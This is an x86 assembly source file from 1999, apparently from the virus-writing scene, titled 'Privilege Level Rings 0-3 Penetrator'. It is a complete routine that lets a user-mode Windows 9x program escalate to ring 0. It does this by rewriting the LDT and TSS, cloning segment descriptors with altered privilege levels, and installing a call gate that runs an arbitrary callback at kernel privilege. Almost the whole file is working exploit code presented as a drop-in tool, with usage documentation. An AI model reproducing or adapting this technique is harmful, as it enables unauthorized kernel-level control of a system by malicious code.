;--------------------------------------------------------------------------;
; Privilege Level Rings 0-3 Penetrator v1.0, (x) 1999 by PREDAt0R	   ;
;--------------------------------------------------------------------------;
;
; Features:
;
;   target oses are Windows 9x family
;   actual usage is allowed only for win32 applications (ring 3)
;   penetrates at the privilege level rings 0-3
;   uses ldt callgate, modifies only current tss and ldt
;   simply code
;
; Usage:
;
;  bPL          - bits 0 and 1 are required privilege level
;  farCallBack  - 32-bit offset of far callback procedure placed at
;		  the current cs, its code must be crowned with retf
;
; Returns:
;
;  eax          - result value, received from farCallBack procedure
;
;--------------------------------------------------------------------------;
; ps: you can e-mail me at necrobug@usa.net
;

penetrator_x	proc	bPL:dword,farCallBack:dword
		uses	ebx,esi,edi

; create new stack segment with dpl=[bPl] at the third descriptor of ldt
; before the very end

	call	get_ldt_nfo			; get ldt base address at ebx
						; and ldt limit at edi
	sub	di,23				; offset of the third descript.
	push	ss				; before end at ldt
	pop	esi				; get ss selector at esi
	call	create_copy_of_descriptor	; create copy of ss descriptor

; fix ssx:espx fields for specified privilege level x=[bPL] at the current tss

	str	ax				; eax=tss selector
	call	get_segment_nfo			; get tss base address at ebx

	mov	di,word ptr [bPL]		; get required privilege level
	and	di,11b
	jz	do_not_modify_tss		; do nothing if required pl=0
	cmp	di,11b				; or 3
	je	do_not_modify_tss
	mov	eax,esp
	sub	eax,100h
	or	si,100b				; for new ss selector: set ti=
	or	si,di				; ldt and rpl=[bPL]
	mov	dword ptr [ebx+8*edi+4],eax	; fix espx
	mov	dword ptr [ebx+8*edi+8],esi	; fix ssx

do_not_modify_tss:

; create new code segment with dpl=[bPl] at the second descriptor of ldt
; before the very end

	call	get_ldt_nfo			; get ldt base address at ebx
						; and ldt limit at edi
	sub	di,15				; edi = offset in ldt of second
	push	cs				; descriptor before very end
	pop	esi				; get cs selector at esi
	call	create_copy_of_descriptor	; create copy of cs descriptor

; create a callgate at the last descriptor in ldt

	mov	eax,edi				; edi = pointer to the last
	sub	eax,ebx				; descriptor in ldt, eax =
	or	al,111b				; callgate selector,ti=1,rpl=3
	push	eax				; save call address at the stack
	push	0h

	mov	eax,dword ptr [farCallBack]
	stosw					; store first word of offset
	xchg	esi,eax				; esi=new cs selector
	or	al,100b				; set ti=ldt,rpl bits ignored
	stosw					; store new cs selector
	mov	ax,1110110000000000b		; callgate dpl=3
	stosw					; store wc and access byte
	shld	eax,esi,16
	stosw					; store second word of offset

; switch to ring 0-3 through callgate

	db	0ffh,1ch,24h			; call far [esp]
	add	esp,8				; correct stack

	ret

;--------------------------------------------------------------------------;
; routine loads base address of specified segment from descriptor in gdt   ;
;--------------------------------------------------------------------------;
;
; usage: ax=16-bit segment selector (if get_segment_nfo called)
;
; return: eax=address of segment descriptor
;	  ebx=base address of segment
;	  edi=16-bit limit
;

get_ldt_nfo:
	sldt	ax

get_segment_nfo:
	sgdt	fword ptr [esp-6]		; get gdt limit/base at [esp-6]
	and	eax,1111111111111000b
	add	eax,dword ptr [esp-4]		; eax points to segment des-
	movzx	edi,word ptr [eax]		; criptor. save limit at edi
	mov	bl,byte ptr [eax+4]
	mov	bh,byte ptr [eax+7]
	shl	ebx,16
	mov	bx,word ptr [eax+2]		; ebx points to 1st byte of
	retn					; specified segment

;--------------------------------------------------------------------------;
; routine copies descriptor with selector in esi into descriptor with	   ;
; selector in edi and sets its dpl=[bPL]				   ;
;--------------------------------------------------------------------------;
;
; usage: esi=16-bit segment selector of source descriptor
;	 edi=16-bit segment selector of destination (target) descriptor
;	 ebx=base address of descriptors table
;
; return: descriptor copied,
;	  esi=16-bit segment selector of target descripotr (saved edi value)
;	  edi=points to next descriptor after destination descriptor
;	  eax=destroyed
;

create_copy_of_descriptor:
	push	edi
	and	esi,1111111111111000b		; source selector
	add	esi,ebx
	add	edi,ebx				; destination descriptor
	cld
	movsd
	movsd
	mov	al,byte ptr [bPL]		; get required privilege level
	not	al
	and	al,11b
	shl	al,5
	xor	byte ptr [edi-3],al		; set dpl of target descriptor
	pop	esi
	retn

penetrator_x	endp
